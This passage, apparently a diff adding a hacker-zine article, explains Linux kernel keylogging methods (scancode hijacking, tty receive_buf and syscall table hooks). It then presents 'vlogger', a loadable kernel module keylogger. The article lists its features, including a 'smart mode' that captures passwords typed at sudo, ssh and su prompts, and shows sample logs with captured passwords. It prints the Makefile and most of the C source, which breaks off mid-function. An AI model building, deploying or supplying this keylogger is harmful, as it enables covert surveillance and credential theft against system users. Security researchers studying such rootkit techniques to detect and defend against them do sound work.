+function.  So to do this, we can use kernel function hijacking technique
+introduced by Silvio (see [5]).
+
+/* below is a code snippet written by Plasmoid */
+static struct semaphore hs_sem, log_sem;
+static int logging=1;
+
+#define CODESIZE 7
+static char hs_code[CODESIZE];
+static char hs_jump[CODESIZE] =
+       "\xb8\x00\x00\x00\x00"      /*      movl   $0,%eax  */
+       "\xff\xe0"                  /*      jmp    *%eax    */
+   ;
+
+void (*handle_scancode) (unsigned char, int) =
+        (void (*)(unsigned char, int)) HS_ADDRESS;
+
+void _handle_scancode(unsigned char scancode, int keydown)
+{
+       if (logging && keydown)
+          log_scancode(scancode, LOGFILE);
+    
+       /*
+        * Restore first bytes of the original handle_scancode code.  Call
+        * the restored function and re-restore the jump code.  Code is
+        * protected by semaphore hs_sem, we only want one CPU in here at a
+        * time.
+        */     
+       down(&hs_sem);
+    
+       memcpy(handle_scancode, hs_code, CODESIZE);
+       handle_scancode(scancode, keydown);
+       memcpy(handle_scancode, hs_jump, CODESIZE);
+    
+       up(&hs_sem);
+}
+
+HS_ADDRESS is set by the Makefile executing this command
+HS_ADDRESS=0x$(word 1,$(shell ksyms -a | grep handle_scancode))
+
+  Similar to method presented in 3.1, the advantage of this method is the
+ability to log keystrokes under X and the console, no matter if a tty is
+invoked or not.  And you will know exactly what key is pressed on the
+keyboard (including special keys such as Control, Alt, Shift, Print Screen,
+...).  But this method is platform dependent and won't be portable among
+platforms.  This method also can't log keystroke of remote sessions and is
+quite complex for building an advance logger.
+
+
+------[ 3.2.2 - put_queue
+
+  This function is called by handle_scancode() function to put characters
+into tty_queue. 
+
+# /usr/src/linux/drives/char/keyboard.c
+void put_queue(int ch);
+ 
+  To intercept this function, we can use the above technique as in section
+(3.2.1).
+
+
+------[ 3.2.3 - receive_buf
+
+  receive_buf() function is called by the low-level tty driver to send
+characters received by the hardware to the line discipline for processing.
+
+# /usr/src/linux/drivers/char/n_tty.c */
+static void n_tty_receive_buf(struct tty_struct *tty, const 
+				unsigned char *cp, char *fp, int count)
+
+cp is a pointer to the buffer of input character received by the device.
+fp is a pointer to a pointer of flag bytes which indicate whether a
+character was received with a parity error, etc.
+
+Lets take a deeper look into tty structures
+
+# /usr/include/linux/tty.h
+struct tty_struct {
+	int	magic;
+	struct tty_driver driver;
+	struct tty_ldisc ldisc;
+	struct termios *termios, *termios_locked;
+	...
+}
+
+# /usr/include/linux/tty_ldisc.h
+struct tty_ldisc {
+	int	magic;
+	char	*name;
+	...	
+	void	(*receive_buf)(struct tty_struct *, 
+			const unsigned char *cp, char *fp, int count);
+	int	(*receive_room)(struct tty_struct *);
+	void	(*write_wakeup)(struct tty_struct *);
+};
+
+  To intercept this function, we can save the original tty receive_buf()
+function then set ldisc.receive_buf to our own new_receive_buf() function
+in order to logging user inputs. 
+
+Ex: to log inputs on the tty0
+
+int fd = open("/dev/tty0", O_RDONLY, 0);
+struct file *file = fget(fd);
+struct tty_struct *tty = file->private_data;
+old_receive_buf = tty->ldisc.receive_buf;
+tty->ldisc.receive_buf = new_receive_buf;
+
+void new_receive_buf(struct tty_struct *tty, const unsigned char *cp, 
+						char *fp, int count)
+{	
+	logging(tty, cp, count); 	//log inputs
+
+	/* call the original receive_buf */
+	(*old_receive_buf)(tty, cp, fp, count);
+}
+
+
+------[ 3.2.4 - tty_read
+
+  This function is called when a process wants to read input characters
+from a tty via sys_read() function.
+
+# /usr/src/linux/drives/char/tty_io.c
+static ssize_t tty_read(struct file * file, char * buf, size_t count, 
+				loff_t *ppos)
+
+static struct file_operations tty_fops = {
+	llseek:		tty_lseek,
+	read:		tty_read,
+	write:		tty_write,
+	poll:		tty_poll,
+	ioctl:		tty_ioctl,
+	open:		tty_open,
+	release:	tty_release,
+	fasync:		tty_fasync,
+};
+
+To log inputs on the tty0:
+
+int fd = open("/dev/tty0", O_RDONLY, 0);
+struct file *file = fget(fd);	
+old_tty_read = file->f_op->read;
+file->f_op->read = new_tty_read;
+
+
+------[ 3.2.5 - sys_read/sys_write
+
+  We will intercept sys_read/sys_write system calls to redirect it to our
+own code which logs the content of the read/write calls.  This method was
+presented by halflife in Phrack 50 (see [4]).  I highly recommend reading
+that paper and a great article written by pragmatic called "Complete Linux
+Loadable Kernel Modules" (see [2]).
+
+The code to intercept sys_read/sys_write will be something like this:
+
+extern void *sys_call_table[];
+original_sys_read = sys_call_table[__NR_read];
+sys_call_table[__NR_read] = new_sys_read;
+
+
+--[ 4 - vlogger
+
+  This part will introduce my kernel keylogger which is used method
+described in section 3.2.3 to acquire more abilities than common keyloggers
+used sys_read/sys_write systemcall replacement approach.  I have tested the
+code with the following versions of linux kernel: 2.4.5, 2.4.7, 2.4.17 and
+2.4.18. 
+
+
+----[ 4.1 - The syscall/tty approach
+
+  To logging both local (logged from console) and remote sessions, I chose
+the method of intercepting receive_buf() function (see 3.2.3).
+
+  In the kernel, tty_struct and tty_queue structures are dynamically
+allocated only when the tty is open.  Thus, we also have to intercept
+sys_open syscall to dynamically hooking the receive_buf() function of each
+tty or pty when it's invoked.
+
+// to intercept open syscall
+original_sys_open = sys_call_table[__NR_open];
+sys_call_table[__NR_open] = new_sys_open;
+
+// new_sys_open()
+asmlinkage int new_sys_open(const char *filename, int flags, int mode)
+{
+...
+	// call the original_sys_open
+	ret = (*original_sys_open)(filename, flags, mode);
+	
+	if (ret >= 0) {
+		struct tty_struct * tty;
+...
+		file = fget(ret);
+		tty = file->private_data;
+		if (tty != NULL && 
+...
+			tty->ldisc.receive_buf != new_receive_buf) {
+...
+				// save the old receive_buf			
+				old_receive_buf = tty->ldisc.receive_buf;
+...
+
+		       /* 
+		        * init to intercept receive_buf of this tty
+		        * tty->ldisc.receive_buf = new_receive_buf;
+		        */
+			init_tty(tty, TTY_INDEX(tty));
+		}
+...
+}
+
+// our new receive_buf() function
+void new_receive_buf(struct tty_struct *tty, const unsigned char *cp, 
+						char *fp, int count)
+{
+	if (!tty->real_raw && !tty->raw)	// ignore raw mode
+		// call our logging function to log user inputs 
+		vlogger_process(tty, cp, count); 
+	// call the original receive_buf
+	(*old_receive_buf)(tty, cp, fp, count);
+}
+
+
+----[ 4.2 - Features
+
+  - Logs both local and remote sessions (via tty & pts)
+
+  - Separate logging for each tty/session.  Each tty has their own logging
+    buffer.
+
+  - Nearly support all special chars such as arrow keys (left, right, up,
+    down), F1 to F12, Shift+F1 to Shift+F12, Tab, Insert, Delete, End,
+    Home, Page Up, Page Down, BackSpace, ... 
+
+  - Support some line editing keys included CTRL-U and BackSpace.
+
+  - Timestamps logging, timezone supported (ripped off some codes from
+    libc).
+
+  - Multiple logging modes
+
+	o dumb mode: logs all keystrokes
+
+	o smart mode: detects password prompt automatically to log
+	user/password only.  I used the similar technique presented in
+	"Passive Analysis of SSH (Secure Shell) Traffic" paper by Solar
+	Designer and Dug Song (see [6]).  When the application turns input
+	echoing off, we assume that it is for entering a password.
+
+	o normal mode: disable logging
+
+You can switch between logging modes by using a magic password.
+
+#define VK_TOGLE_CHAR	29	// CTRL-]
+#define MAGIC_PASS	"31337"	// to switch mode, type MAGIC_PASS 
+				// then press VK_TOGLE_CHAR key
+
+----[ 4.3 - How to use
+
+Change the following options
+
+// directory to store log files
+#define LOG_DIR "/tmp/log"
+
+// your local timezone
+#define TIMEZONE	7*60*60	// GMT+7
+
+// your magic password
+#define MAGIC_PASS	"31337" 
+
+Below is how the log file looks like:
+
+[root@localhost log]# ls -l
+total 60
+-rw-------    1 root     root          633 Jun 19 20:59 pass.log
+-rw-------    1 root     root        37593 Jun 19 18:51 pts11
+-rw-------    1 root     root           56 Jun 19 19:00 pts20
+-rw-------    1 root     root          746 Jun 19 20:06 pts26
+-rw-------    1 root     root          116 Jun 19 19:57 pts29
+-rw-------    1 root     root         3219 Jun 19 21:30 tty1
+-rw-------    1 root     root        18028 Jun 19 20:54 tty2
+
+---in dumb mode
+[root@localhost log]# head tty2		// local session
+<19/06/2002-20:53:47 uid=501 bash> pwd
+<19/06/2002-20:53:51 uid=501 bash> uname -a
+<19/06/2002-20:53:53 uid=501 bash> lsmod
+<19/06/2002-20:53:56 uid=501 bash> pwd
+<19/06/2002-20:54:05 uid=501 bash> cd /var/log
+<19/06/2002-20:54:13 uid=501 bash> tail messages
+<19/06/2002-20:54:21 uid=501 bash> cd ~
+<19/06/2002-20:54:22 uid=501 bash> ls
+<19/06/2002-20:54:29 uid=501 bash> tty
+<19/06/2002-20:54:29 uid=501 bash> [UP]
+
+[root@localhost log]# tail pts11	// remote session  
+<19/06/2002-18:48:27 uid=0 bash> cd new
+<19/06/2002-18:48:28 uid=0 bash> cp -p ~/code .
+<19/06/2002-18:48:21 uid=0 bash> lsmod
+<19/06/2002-18:48:27 uid=0 bash> cd /va[TAB][^H][^H]tmp/log/
+<19/06/2002-18:48:28 uid=0 bash> ls -l
+<19/06/2002-18:48:30 uid=0 bash> tail pts11
+<19/06/2002-18:48:38 uid=0 bash> [UP] | more
+<19/06/2002-18:50:44 uid=0 bash> vi vlogertxt
+<19/06/2002-18:50:48 uid=0 vi> :q
+<19/06/2002-18:51:14 uid=0 bash> rmmod vlogger
+
+---in smart mode
+[root@localhost log]# cat pass.log
+[19/06/2002-18:28:05 tty=pts/20 uid=501 sudo]
+USER/CMD sudo traceroute yahoo.com
+PASS 5hgt6d
+PASS 
+
+[19/06/2002-19:59:15 tty=pts/26 uid=0 ssh]
+USER/CMD ssh guest@host.com
+PASS guest
+
+[19/06/2002-20:50:44 tty=pts/29 uid=504 ftp]
+USER/CMD open ftp.ilog.fr
+USER Anonymous
+PASS heh@heh
+
+[19/06/2002-20:59:54 tty=pts/29 uid=504 su]
+USER/CMD su -
+PASS asdf1234
+
+
+Please check http://www.thehackerschoice.com/ for update on the new version
+of this tool.
+
+
+--[ 5 - Greets  
+
+Thanks to plasmoid, skyper for your very useful comments
+Greets to THC, vnsecurity and all friends
+Finally, thanks to mr. thang for english corrections
+
+
+--[ 6 - References
+
+[1] Linux Kernel Module Programming
+    http://www.tldp.org/LDP/lkmpg/
+[2] Complete Linux Loadable Kernel Modules - Pragmatic
+    http://www.thehackerschoice.com/papers/LKM_HACKING.html
+[3] The Linux keyboard driver - Andries Brouwer
+    http://www.linuxjournal.com/lj-issues/issue14/1080.html
+[4] Abuse of the Linux Kernel for Fun and Profit - Halflife
+    http://www.phrack.com/phrack/50/P50-05
+[5] Kernel function hijacking - Silvio Cesare
+    http://www.big.net.au/~silvio/kernel-hijack.txt
+[6] Passive Analysis of SSH (Secure Shell) Traffic - Solar Designer 
+    http://www.openwall.com/advisories/OW-003-ssh-traffic-analysis.txt
+[7] Kernel Based Keylogger - Mercenary
+    http://packetstorm.decepticons.org/UNIX/security/kernel.keylogger.txt
+
+--[ 7 - Keylogger sources
+
+<++> vlogger/Makefile
+#
+#  vlogger 1.0 by rd
+#
+#  LOCAL_ONLY		logging local session only. Doesn't intercept
+#			sys_open system call
+#  DEBUG		Enable debug. Turn on this options will slow
+#			down your system
+#
+
+KERNELDIR =/usr/src/linux
+include $(KERNELDIR)/.config
+MODVERFILE = $(KERNELDIR)/include/linux/modversions.h
+
+MODDEFS = -D__KERNEL__ -DMODULE -DMODVERSIONS
+CFLAGS = -Wall -O2 -I$(KERNELDIR)/include -include $(MODVERFILE) \
+	-Wstrict-prototypes -fomit-frame-pointer -pipe \
+	-fno-strength-reduce -malign-loops=2 -malign-jumps=2 \
+	-malign-functions=2
+
+all : vlogger.o
+
+vlogger.o: vlogger.c
+	$(CC) $(CFLAGS) $(MODDEFS) -c $^ -o $@
+
+clean:
+	rm -f *.o
+<-->
+<++> vlogger/vlogger.c
+/*
+ *  vlogger 1.0
+ *
+ *  Copyright (C) 2002 rd <rd@vnsecurity.net>
+ *
+ *  Please check http://www.thehackerschoice.com/ for update
+ *
+ *  This program is free software; you can redistribute it and/or modify
+ *  it under the terms of the GNU General Public License as published by
+ *  the Free Software Foundation; either version 2 of the License, or
+ *  (at your option) any later version
+ *
+ *  This program is distributed in the hope that it will be useful, but 
+ *  WITHOUT ANY WARRANTY; without even the implied warranty of
+ *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU 
+ *  General Public License for more details.
+ *
+ *  Greets to THC & vnsecurity
+ *
+ */
+
+#define __KERNEL_SYSCALLS__
+#include <linux/version.h>
+#include <linux/module.h>
+#include <linux/kernel.h>
+#include <linux/smp_lock.h>
+#include <linux/sched.h>
+#include <linux/unistd.h>
+#include <linux/string.h>
+#include <linux/file.h>
+#include <asm/uaccess.h>
+#include <linux/proc_fs.h>
+#include <asm/errno.h>
+#include <asm/io.h>
+
+#ifndef KERNEL_VERSION
+#define KERNEL_VERSION(a,b,c) (((a) << 16) + ((b) << 8) + (c))
+#endif
+
+#if LINUX_VERSION_CODE >= KERNEL_VERSION(2,4,9)
+MODULE_LICENSE("GPL");
+MODULE_AUTHOR("rd@vnsecurity.net");
+#endif
+
+#define MODULE_NAME "vlogger "
+#define MVERSION "vlogger 1.0 - by rd@vnsecurity.net\n"
+
+#ifdef DEBUG
+#define DPRINT(format, args...) printk(MODULE_NAME format, ##args)
+#else
+#define DPRINT(format, args...)
+#endif
+
+#define N_TTY_NAME "tty"
+#define N_PTS_NAME "pts"
+#define MAX_TTY_CON 8
+#define MAX_PTS_CON 256
+#define LOG_DIR "/tmp/log"
+#define PASS_LOG LOG_DIR "/pass.log"
+
+#define TIMEZONE 7*60*60	// GMT+7
+
+#define ESC_CHAR 27
+#define BACK_SPACE_CHAR1 127	// local
+#define BACK_SPACE_CHAR2 8	// remote
+
+#define VK_TOGLE_CHAR 29	// CTRL-]
+#define MAGIC_PASS "31337" 	// to switch mode, press MAGIC_PASS and 
+				// VK_TOGLE_CHAR
+
+#define	VK_NORMAL 0
+#define	VK_DUMBMODE 1
+#define	VK_SMARTMODE 2
+#define DEFAULT_MODE VK_DUMBMODE
+
+#define MAX_BUFFER 256
+#define MAX_SPECIAL_CHAR_SZ 12
+
+#define TTY_NUMBER(tty) MINOR((tty)->device) - (tty)->driver.minor_start \
+			+ (tty)->driver.name_base
+#define TTY_INDEX(tty) tty->driver.type == \
+			TTY_DRIVER_TYPE_PTY?MAX_TTY_CON + \
+			TTY_NUMBER(tty):TTY_NUMBER(tty)
+#define IS_PASSWD(tty) L_ICANON(tty) && !L_ECHO(tty)
+#define TTY_WRITE(tty, buf, count) (*tty->driver.write)(tty, 0, \
+							buf, count)
+
+#define TTY_NAME(tty) (tty->driver.type == \
+		TTY_DRIVER_TYPE_CONSOLE?N_TTY_NAME: \
+		tty->driver.type == TTY_DRIVER_TYPE_PTY && \
+		tty->driver.subtype == PTY_TYPE_SLAVE?N_PTS_NAME:"")
+
+#define BEGIN_KMEM { mm_segment_t old_fs = get_fs(); set_fs(get_ds());
+#define END_KMEM set_fs(old_fs); }
+
+extern void *sys_call_table[];
+int errno;
+
+struct tlogger {
+	struct tty_struct *tty;
+	char buf[MAX_BUFFER + MAX_SPECIAL_CHAR_SZ];
+	int lastpos;
+	int status;
+	int pass;
+};
+
+struct tlogger *ttys[MAX_TTY_CON + MAX_PTS_CON] = { NULL };
+void (*old_receive_buf)(struct tty_struct *, const unsigned char *,
+			char *, int);
+asmlinkage int (*original_sys_open)(const char *, int, int);
+
+int vlogger_mode = DEFAULT_MODE;
+
+/* Prototypes */
+static inline void init_tty(struct tty_struct *, int);
+
+/*
+static char *_tty_make_name(struct tty_struct *tty, 
+				const char *name, char *buf)
+{
+	int idx = (tty)?MINOR(tty->device) - tty->driver.minor_start:0;
+
+	if (!tty) 
+		strcpy(buf, "NULL tty");
+	else
+		sprintf(buf, name,
+			idx + tty->driver.name_base);
+	return buf;
+}
+
+char *tty_name(struct tty_struct *tty, char *buf)
+{
+	return _tty_make_name(tty, (tty)?tty->driver.name:NULL, buf);
+}
+*/
+
+#define SECS_PER_HOUR   (60 * 60)
+#define SECS_PER_DAY    (SECS_PER_HOUR * 24)
+#define isleap(year) \
+	((year) % 4 == 0 && ((year) % 100 != 0 || (year) % 400 == 0))
+#define DIV(a, b) ((a) / (b) - ((a) % (b) < 0))
+#define LEAPS_THRU_END_OF(y) (DIV (y, 4) - DIV (y, 100) + DIV (y, 400))
+
+struct vtm {
+	int tm_sec;
+	int tm_min;
+	int tm_hour;
+	int tm_mday;
+	int tm_mon;
+	int tm_year;
+};
+
+
+/* 
+ *  Convert from epoch to date 
+ */
+ 
+int epoch2time (const time_t *t, long int offset, struct vtm *tp)
+{
+	static const unsigned short int mon_yday[2][13] = {
+	   /* Normal years.  */
+	   { 0, 31, 59, 90, 120, 151, 181, 212, 243, 273, 304, 334, 365 },
+	   /* Leap years.  */
+	   { 0, 31, 60, 91, 121, 152, 182, 213, 244, 274, 305, 335, 366 }
+	};
+
+	long int days, rem, y;
+	const unsigned short int *ip;
+
+	days = *t / SECS_PER_DAY;
+	rem = *t % SECS_PER_DAY;
+	rem += offset;
+	while (rem < 0) { 
+		rem += SECS_PER_DAY;
+		--days;
+	}
+	while (rem >= SECS_PER_DAY) {
+		rem -= SECS_PER_DAY;
+		++days;
+	}
+	tp->tm_hour = rem / SECS_PER_HOUR;
+	rem %= SECS_PER_HOUR;
+	tp->tm_min = rem / 60;
+	tp->tm_sec = rem % 60;
+	y = 1970;
+
+	while (days < 0 || days >= (isleap (y) ? 366 : 365)) {
+		long int yg = y + days / 365 - (days % 365 < 0);
+		days -= ((yg - y) * 365
+			+ LEAPS_THRU_END_OF (yg - 1)
+			- LEAPS_THRU_END_OF (y - 1));
+		y = yg;
+	}
+	tp->tm_year = y - 1900;
+	if (tp->tm_year != y - 1900)
+		return 0;
+	ip = mon_yday[isleap(y)];
+	for (y = 11; days < (long int) ip[y]; --y)
+		continue;
+	days -= ip[y];
+	tp->tm_mon = y;
+	tp->tm_mday = days + 1;
+	return 1;
+}
+
+
+/* 
+ *  Get current date & time
+ */
+
+void get_time (char *date_time) 
+{
+	struct timeval tv;
+	time_t t;
+	struct vtm tm;
+	
+	do_gettimeofday(&tv);
+        t = (time_t)tv.tv_sec;
+	
+	epoch2time(&t, TIMEZONE, &tm);
+
+	sprintf(date_time, "%.2d/%.2d/%d-%.2d:%.2d:%.2d", tm.tm_mday,
+		tm.tm_mon + 1, tm.tm_year + 1900, tm.tm_hour, tm.tm_min,
+		tm.tm_sec);
+}
+
+
+/* 
+ * Get task structure from pgrp id
+ */
+
+inline struct task_struct *get_task(pid_t pgrp) 
+{
+	struct task_struct *task = current;
+
+        do {
+                if (task->pgrp == pgrp) {
+                        return task;
+                }
+                task = task->next_task;
+        } while (task != current);
+        return NULL;
+}
+
+
+#define _write(f, buf, sz) (f->f_op->write(f, buf, sz, &f->f_pos))
+#define WRITABLE(f) (f->f_op && f->f_op->write)
+
+int write_to_file(char *logfile, char *buf, int size)
+{
+	int ret = 0;
+	struct file   *f = NULL;
+
+	lock_kernel();
+	BEGIN_KMEM;
+	f = filp_open(logfile, O_CREAT|O_APPEND, 00600);
+
+	if (IS_ERR(f)) {
+		DPRINT("Error %ld opening %s\n", -PTR_ERR(f), logfile);
+		ret = -1;
+	} else {
+		if (WRITABLE(f))
+			_write(f, buf, size);
+		else {
+	      		DPRINT("%s does not have a write method\n",
+	      			logfile);
+			ret = -1;
+		}
+    			
+		if ((ret = filp_close(f,NULL)))
+			DPRINT("Error %d closing %s\n", -ret, logfile);
+	}
+	END_KMEM;
+	unlock_kernel();
+
+	return ret;
+}
+
+
+#define BEGIN_ROOT { int saved_fsuid = current->fsuid; current->fsuid = 0;
+#define END_ROOT current->fsuid = saved_fsuid; }
+
+
+/* 
+ *  Logging keystrokes
+ */
+
+void logging(struct tty_struct *tty, struct tlogger *tmp, int cont) 
+{
+	int i;
+
+	char logfile[256];
+	char loginfo[MAX_BUFFER + MAX_SPECIAL_CHAR_SZ + 256];
+	char date_time[24];
+	struct task_struct *task;
+
+	if (vlogger_mode == VK_NORMAL)
+		return;
+
+	if ((vlogger_mode == VK_SMARTMODE) && (!tmp->lastpos || cont))
+		return;
+		
+	task = get_task(tty->pgrp);
+		
+	for (i=0; i<tmp->lastpos; i++)
+		if (tmp->buf[i] == 0x0D) tmp->buf[i] = 0x0A;
+
+	if (!cont) 
+		tmp->buf[tmp->lastpos++] = 0x0A;
+	
+	tmp->buf[tmp->lastpos] = 0;
+
+	if (vlogger_mode == VK_DUMBMODE) {
+		snprintf(logfile, sizeof(logfile)-1, "%s/%s%d",
+				LOG_DIR, TTY_NAME(tty),	TTY_NUMBER(tty));
+		BEGIN_ROOT
+		if (!tmp->status) {
+			get_time(date_time);
+			if (task)
+				snprintf(loginfo, sizeof(loginfo)-1,
+					"<%s uid=%d %s> %s", date_time,
+					task->uid, task->comm, tmp->buf);
+			else
+				snprintf(loginfo, sizeof(loginfo)-1,
+					"<%s> %s", date_time, tmp->buf);
+			
+			write_to_file(logfile, loginfo, strlen(loginfo));
+		} else {
+			write_to_file(logfile, tmp->buf, tmp->lastpos);
+		}
+		END_ROOT
+
+#ifdef DEBUG
+		if (task)
+			DPRINT("%s/%d uid=%d %s: %s", 
+				TTY_NAME(tty), TTY_NUMBER(tty), 
+				task->uid, task->comm, tmp->buf);
+		else
+			DPRINT("%s", tmp->buf);
+#endif
+		tmp->status = cont;
+		
+	} else {
+
+		/*
+		 *  Logging USER/CMD and PASS in SMART_MODE
+		 */
+
+		BEGIN_ROOT
+		if (!tmp->pass) {
+			get_time(date_time);
+			if (task)
+				snprintf(loginfo, sizeof(loginfo)-1,
+					"\n[%s tty=%s/%d uid=%d %s]\n"
+					"USER/CMD %s", date_time, 
+					TTY_NAME(tty),TTY_NUMBER(tty), 
+					task->uid, task->comm, tmp->buf);
+			else
+				snprintf(loginfo, sizeof(loginfo)-1,
+					"\n[%s tty=%s/%d]\nUSER/CMD %s",
+					date_time, TTY_NAME(tty), 
+					TTY_NUMBER(tty), tmp->buf);
+
+			write_to_file(PASS_LOG, loginfo, strlen(loginfo));
+		} else {
+			snprintf(loginfo, sizeof(loginfo)-1, "PASS %s",
+					tmp->buf);
+			write_to_file (PASS_LOG, loginfo, strlen(loginfo));
+		}
+
+		END_ROOT
+
+#ifdef DEBUG
+		if (!tmp->pass)
+			DPRINT("USER/CMD %s", tmp->buf);
+		else
+			DPRINT("PASS %s", tmp->buf);
+#endif
+	}
+
+	if (!cont) tmp->buf[--tmp->lastpos] = 0;
+}
+
+
+#define resetbuf(t)		\
+{				\
+	t->buf[0] = 0;		\
+	t->lastpos = 0;		\
+}
+
+#define append_c(t, s, n)	\
+{				\
+	t->lastpos += n;	\
+	strncat(t->buf, s, n);	\
+}
+
+static inline void reset_all_buf(void)
+{
+	int i = 0;
+	for (i=0; i<MAX_TTY_CON + MAX_PTS_CON; i++)
+		if (ttys[i] != NULL)
+			resetbuf(ttys[i]);
+}
+
+void special_key(struct tlogger *tmp, const unsigned char *cp, int count)
+{
+    	switch(count) {
+	    case 2:
+    	    	switch(cp[1]) {
+			case '\'':
+				append_c(tmp, "[ALT-\']", 7);
+				break;
+			case ',':
+				append_c(tmp, "[ALT-,]", 7);
+				break;
+			case '-':
+				append_c(tmp, "[ALT--]", 7);
+				break;
+			case '.':
+				append_c(tmp, "[ALT-.]", 7);
+				break;
+			case '/':
+				append_c(tmp, "[ALT-/]", 7);
+				break;
+			case '0':
+				append_c(tmp, "[ALT-0]", 7);
+				break;
+			case '1':
+				append_c(tmp, "[ALT-1]", 7);
+				break;
+			case '2':
+				append_c(tmp, "[ALT-2]", 7);
+				break;
+			case '3':
+				append_c(tmp, "[ALT-3]", 7);
+				break;
+			case '4':
+				append_c(tmp, "[ALT-4]", 7);
+				break;
+			case '5':
+				append_c(tmp, "[ALT-5]", 7);
+				break;
+			case '6':
+				append_c(tmp, "[ALT-6]", 7);
+				break;
+			case '7':
+				append_c(tmp, "[ALT-7]", 7);
+				break;
+			case '8':
+				append_c(tmp, "[ALT-8]", 7);
+				break;
+			case '9':
+				append_c(tmp, "[ALT-9]", 7);
+				break;
+			case ';':
+				append_c(tmp, "[ALT-;]", 7);
+				break;
+			case '=':
+				append_c(tmp, "[ALT-=]", 7);
+				break;
+			case '[':
+				append_c(tmp, "[ALT-[]", 7);
+				break;
+			case '\\':
+				append_c(tmp, "[ALT-\\]", 7);
+				break;
+			case ']':
+				append_c(tmp, "[ALT-]]", 7);
+				break;
+			case '`':
+				append_c(tmp, "[ALT-`]", 7);
+				break;
+			case 'a':
+				append_c(tmp, "[ALT-A]", 7);
+				break;
+			case 'b':
+				append_c(tmp, "[ALT-B]", 7);
+				break;
+			case 'c':
+				append_c(tmp, "[ALT-C]", 7);
+				break;
+			case 'd':
+				append_c(tmp, "[ALT-D]", 7);
+				break;
+			case 'e':
+				append_c(tmp, "[ALT-E]", 7);
+				break;
+			case 'f':
+				append_c(tmp, "[ALT-F]", 7);
+				break;
+			case 'g':
+				append_c(tmp, "[ALT-G]", 7);
+				break;
+			case 'h':
+				append_c(tmp, "[ALT-H]", 7);
+				break;
+			case 'i':
+				append_c(tmp, "[ALT-I]", 7);
+				break;
+			case 'j':
+				append_c(tmp, "[ALT-J]", 7);
+				break;
+			case 'k':
+				append_c(tmp, "[ALT-K]", 7);
+				break;
+			case 'l':
+				append_c(tmp, "[ALT-L]", 7);
+				break;
+			case 'm':
+				append_c(tmp, "[ALT-M]", 7);
+				break;
+			case 'n':
+				append_c(tmp, "[ALT-N]", 7);
+				break;
+			case 'o':
+				append_c(tmp, "[ALT-O]", 7);
+				break;
+			case 'p':
+				append_c(tmp, "[ALT-P]", 7);
+				break;
+			case 'q':
+				append_c(tmp, "[ALT-Q]", 7);
+				break;
+			case 'r':
+				append_c(tmp, "[ALT-R]", 7);
+				break;
+			case 's':
+				append_c(tmp, "[ALT-S]", 7);
+				break;
+			case 't':
+				append_c(tmp, "[ALT-T]", 7);
+				break;
+			case 'u':
+				append_c(tmp, "[ALT-U]", 7);
+				break;
+			case 'v':
+				append_c(tmp, "[ALT-V]", 7);
+				break;
+			case 'x':
+				append_c(tmp, "[ALT-X]", 7);
+				break;
+			case 'y':
+				append_c(tmp, "[ALT-Y]", 7);
+				break;
+			case 'z':
+				append_c(tmp, "[ALT-Z]", 7);
+				break;
+		}
+		break;
+	    case 3:
+		switch(cp[2]) {
+			case 68:
+				// Left: 27 91 68
+				append_c(tmp, "[LEFT]", 6);
+				break;
+			case 67:
+				// Right: 27 91 67
+				append_c(tmp, "[RIGHT]", 7);
+				break;
+			case 65:
+				// Up: 27 91 65
+				append_c(tmp, "[UP]", 4);
+				break;
+			case 66:
+				// Down: 27 91 66
+				append_c(tmp, "[DOWN]", 6);
+				break;
+			case 80:
+				// Pause/Break: 27 91 80 
+				append_c(tmp, "[BREAK]", 7);
+				break;
+		}
+		break;
+	    case 4:
+		switch(cp[3]) {
+			case 65:
+				// F1: 27 91 91 65
+				append_c(tmp, "[F1]", 4);
+				break;
+			case 66:
+				// F2: 27 91 91 66
+				append_c(tmp, "[F2]", 4);
+				break;
+			case 67:
+				// F3: 27 91 91 67
+				append_c(tmp, "[F3]", 4);
+				break;
+			case 68:
+				// F4: 27 91 91 68
+				append_c(tmp, "[F4]", 4);
+				break;
+			case 69:
+				// F5: 27 91 91 69
+				append_c(tmp, "[F5]", 4);
+				break;
+			case 126:
+				switch(cp[2]) {
+					case 53:
+						// PgUp: 27 91 53 126
+						append_c(tmp, "[PgUP]", 6);
+						break;
+					case 54:
+						// PgDown: 27 91 54 126
+						append_c(tmp, 
+							"[PgDOWN]", 8);
+						break;
+					case 49:
+						// Home: 27 91 49 126
+						append_c(tmp, "[HOME]", 6);
+						break;
+					case 52:
+						// End: 27 91 52 126
+						append_c(tmp, "[END]", 5);
+						break;
+					case 50:
+						// Insert: 27 91 50 126
+						append_c(tmp, "[INS]", 5);
+						break;
+					case 51:
+						// Delete: 27 91 51 126
+						append_c(tmp, "[DEL]", 5);
+						break;
+				}
+			break;
+		}
+		break;
+	    case 5:
+		if(cp[2] == 50)
+			switch(cp[3]) {
+				case 48:
+					// F9: 27 91 50 48 126
+					append_c(tmp, "[F9]", 4);
+					break;
+				case 49:
+					// F10: 27 91 50 49 126
+					append_c(tmp, "[F10]", 5);
+					break;
+				case 51:
+					// F11: 27 91 50 51 126
+					append_c(tmp, "[F11]", 5);
+					break;
+				case 52:
+					// F12: 27 91 50 52 126
+					append_c(tmp, "[F12]", 5);
+					break;
+				case 53:
+					// Shift-F1: 27 91 50 53 126
+					append_c(tmp, "[SH-F1]", 7);
+					break;
+				case 54:
+					// Shift-F2: 27 91 50 54 126
+					append_c(tmp, "[SH-F2]", 7);
+					break;
+				case 56:
+					// Shift-F3: 27 91 50 56 126
+					append_c(tmp, "[SH-F3]", 7);
+					break;
+				case 57:
+					// Shift-F4: 27 91 50 57 126
+					append_c(tmp, "[SH-F4]", 7);
+					break;
+			}
+		else
+			switch(cp[3]) {
+				case 55:
+					// F6: 27 91 49 55 126
+					append_c(tmp, "[F6]", 4);
+					break;
+		     		case 56:
+					// F7: 27 91 49 56 126
+					append_c(tmp, "[F7]", 4);
+					break;
+     				case 57:
+					// F8: 27 91 49 57 126
+					append_c(tmp, "[F8]", 4);
+					break;
+		     		case 49:
+					// Shift-F5: 27 91 51 49 126
+					append_c(tmp, "[SH-F5]", 7);
+					break;
+		     		case 50:
+					// Shift-F6: 27 91 51 50 126
+					append_c(tmp, "[SH-F6]", 7);
+					break;
+     				case 51:
+					// Shift-F7: 27 91 51 51 126
+					append_c(tmp, "[SH-F7]", 7);
+					break;
+		     		case 52:
+					// Shift-F8: 27 91 51 52 126
+					append_c(tmp, "[SH-F8]", 7);
+					break;
+			};
+		break;
+	    default:	// Unknow
+		break;
+    }
+}
+
+
+/* 
+ *  Called whenever user press a key
+ */
+
+void vlogger_process(struct tty_struct *tty, 
